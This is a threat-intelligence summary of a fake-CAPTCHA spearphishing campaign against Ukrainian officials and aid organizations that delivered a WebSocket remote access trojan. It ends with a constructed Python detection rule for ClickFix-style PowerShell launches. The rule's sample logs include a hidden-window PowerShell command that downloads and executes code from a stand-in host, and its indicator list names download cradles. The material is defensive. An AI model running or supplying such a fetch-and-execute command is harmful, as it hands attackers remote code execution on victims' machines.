A one-day spearphishing campaign targeting Ukrainian officials and humanitarian organizations used fake CAPTCHA prompts to deliver a WebSocket Remote Access Trojan. The attack involved social engineering, fake communications, and malware that exfiltrated sensitive system data, with links to possible Russian threat actor infrastructure. #PhantomCaptcha #ClickFix #ColdRiver
Key points
- The campaign targeted Ukrainian government and aid organizations, including the Red Cross and UNICEF.
- The attackers used fake Zoom links and CAPTCHA prompts to trick victims into executing malicious PowerShell commands.
- The malware collected system information and established remote control through a WebSocket RAT.
- The campaign was short-lived but was linked to subsequent activity involving Android spyware and cloud storage tools.
- Detected infrastructure and malware suggest connections to Russian threat groups such as ColdRiver.
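Detection logic for the fake-CAPTCHA lure described in the key points (victims tricked into running a PowerShell command), added here as an example and not taken from the report or its authors: it scans constructed process-creation events and flags PowerShell launched from explorer.exe (the Win+R / Run dialog path such lures rely on) with hidden-window, encoded-command or download-cradle arguments. The log format, hostnames, timestamps and URL are constructed assumptions.

```python
import re
from typing import Dict, List

# Constructed process-creation events (Sysmon/EDR-style key=value lines); not from the report.
SAMPLE_LOGS = [
    "2025-10-08T09:12:03Z host=WS01 parent=C:\\Windows\\explorer.exe "
    "image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    'cmdline=powershell -w hidden -nop -c "irm https://captcha-check.invalid/verify | iex"',
    "2025-10-08T09:13:10Z host=WS01 parent=C:\\Windows\\System32\\cmd.exe "
    "image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "cmdline=powershell -File C:\\scripts\\inventory.ps1",
    "2025-10-08T09:14:44Z host=WS02 parent=C:\\Windows\\explorer.exe "
    "image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "cmdline=powershell -enc SQBFAFgA",
]

LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) parent=(?P<parent>\S+) image=(?P<image>\S+) cmdline=(?P<cmd>.*)$"
)

# Command-line traits typical of a copy-paste "verification" lure; each one contributes a reason.
INDICATORS = [
    (re.compile(r"-w(indowstyle)?\s+h", re.I), "hidden window"),
    (re.compile(r"-e(nc|ncodedcommand)?\b", re.I), "encoded command"),
    (re.compile(r"\b(irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I), "download cradle"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), "invoke-expression"),
]


def detect_clickfix(lines: List[str]) -> List[Dict[str, object]]:
    """Flag PowerShell spawned by explorer.exe with any suspicious argument, or
    PowerShell with two or more suspicious arguments regardless of parent."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        image = m["image"].rsplit("\\", 1)[-1].lower()
        if image not in ("powershell.exe", "pwsh.exe"):
            continue
        parent = m["parent"].rsplit("\\", 1)[-1].lower()
        reasons = [label for rx, label in INDICATORS if rx.search(m["cmd"])]
        from_explorer = parent == "explorer.exe"
        if (from_explorer and reasons) or len(reasons) >= 2:
            if from_explorer:
                reasons.insert(0, "spawned by explorer.exe")
            hits.append({"time": m["ts"], "host": m["host"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in detect_clickfix(SAMPLE_LOGS):
        print(h["time"], h["host"], ", ".join(h["reasons"]))
```

The second sample (an administrator's script run from cmd.exe) is deliberately left unflagged so the rule does not fire on every PowerShell launch.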